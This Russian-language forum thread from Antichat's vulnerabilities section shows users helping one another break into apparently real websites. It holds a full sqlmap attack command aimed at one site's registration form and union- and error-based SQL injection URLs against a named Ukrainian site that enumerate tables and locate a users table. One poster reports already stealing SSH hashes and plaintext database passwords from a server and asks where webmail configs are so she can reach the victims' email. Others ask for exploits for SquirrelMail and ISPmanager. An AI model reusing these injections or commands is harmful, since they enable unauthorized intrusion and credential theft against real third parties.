HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #24331  
Старый 12.04.2015, 13:31
xxl
Новичок
Регистрация: 22.11.2012
Сообщений: 21
Провел на форуме:
4245

Репутация: 0
По умолчанию

python /CMS/sqlmap-master/sqlmap.py -u "http://sub.adomain.ru/users/register/ " --data="first_name=aaa&last_name=aaa&email=aqwe@sda.ru&password_1=asdasd&password_2=asdasd&country=none& city=ffff&phone_number=%2B894613216516&traffic_sou rce_types[]=interesting&traffic_desc=ddddd&spec=register&_q=1 " -f --random-agent --banner --parse-errors --all --risk=3 --level=5 --batch --dump-format=HTML --output-dir='/var/www/../' -t '/var/www/../traff.txt' > '/var/www/../log.txt'

В общем,если есть возможность и желание,то прошу помощи,т.к. сам не смог разобраться

log: http://rghost.ru/private/6LHmtr2tj/4...c49b6bd2f9c241

traff: http://rghost.ru/private/8tx2bwB6Y/a...fa935d0ea42365

Пробовал сделать поиск по файлу траффика(т.к. БД была определена Oracle=> ошибки искал,как ORA-*) результата нет. Да и вообще там нет ошибок,как мне кажется
 
Ответить с цитированием

  #24332  
Старый 16.04.2015, 15:45
vikler
Познающий
Регистрация: 16.08.2012
Сообщений: 92
Провел на форуме:
36068

Репутация: 0
По умолчанию

Есть доступ ко всем файлам на сервере, вытащила ssh хэши, пароли SQL в чистом виде. в общем, это здорово, но мне нужен доступ к их почтам. Не подскажете, где могут быть конфиги?

EDIT: они юзают horde webmail=>/etc/psa/.webmail.shadow верно? Но этот файл закрыт на чтение root only FUCK. Неужели нет никаких более способов? Неужели я потратила целый день за зря ? ну таааааааааааааак обидно, сил нет
 
Ответить с цитированием

  #24333  
Старый 17.04.2015, 20:16
xxl
Новичок
Регистрация: 22.11.2012
Сообщений: 21
Провел на форуме:
4245

Репутация: 0
По умолчанию

SquirrelMail 1.4.21 - есть ли уязвимости? Погуглил - информация о наличии уязвимостей есть,но нет эксплойтов...

+ ISPmanager v4 lite. Есть ли что-то? (кроме открытой передачи пароля в API)
 
Ответить с цитированием

  #24334  
Старый 18.04.2015, 22:18
teh
Познающий
Регистрация: 02.12.2010
Сообщений: 79
Провел на форуме:
26437

Репутация: -2
По умолчанию

 
Ответить с цитированием

  #24335  
Старый 19.04.2015, 02:32
xxl
Новичок
Регистрация: 22.11.2012
Сообщений: 21
Провел на форуме:
4245

Репутация: 0
По умолчанию

Цитата:
Сообщение от teh  
http://www.techexpo.kiev.ua/info_page.php?id=-37 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY MID(VERSION(), FLOOR(RAND(0)*2), 64)) - версия БД.

(

это если ручками хочешь перебирать,а так:

sqlmap сказал,что

[WARNING] no table(s) found.

Но он пиздит 100%,там самому надо перебирать(SELECT table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema = 'DB')

)
 
Ответить с цитированием

  #24336  
Старый 19.04.2015, 07:32
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию

Цитата:
Сообщение от teh  
Там нету такой таблицы

http://www.techexpo.kiev.ua/info_pa...656562636e65745f746563686578706f--+k&sub_id=1

eebc.cms_users
 
Ответить с цитированием

  #24337  
Старый 19.04.2015, 20:20
teh
Познающий
Регистрация: 02.12.2010
Сообщений: 79
Провел на форуме:
26437

Репутация: -2
По умолчанию

http://www.techexpo.kiev.ua/info_pa...e,4 from information_schema.tables--&sub_id=1

но, information_schema показывает что она существует
 
Ответить с цитированием

  #24338  
Старый 19.04.2015, 21:52
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от teh  

http://www.techexpo.kiev.ua/info_page.php?id=-37 union select 1,2,table_name,4 from information_schema.tables--&sub_id=1
но, information_schema показывает что она существует
таким запросом вы увидите список всех таблиц из всех доступных бд. чтобы узнать таблицы из конкретной бд используйте where
 
Ответить с цитированием

  #24339  
Старый 20.04.2015, 01:33
teh
Познающий
Регистрация: 02.12.2010
Сообщений: 79
Провел на форуме:
26437

Репутация: -2
По умолчанию

Цитата:
Сообщение от faza02  

таким запросом вы увидите список всех таблиц из всех доступных бд. чтобы узнать таблицы из конкретной бд используйте where
спасибо, понял
 
Ответить с цитированием

  #24340  
Старый 20.04.2015, 12:42
YaBtr
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
Провел на форуме:
132418

Репутация: 652


По умолчанию

Цитата:
Сообщение от xxl  


можно ли раскрутить самому? и как
xxl , если хотите, чтобы Вам помогли, то нужно задавать корректный и внятный вопрос, а еще лучше, опубликовать ссылку на язвимый сайт. Читайте правила! Если не отредактируете, пост будет удален.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.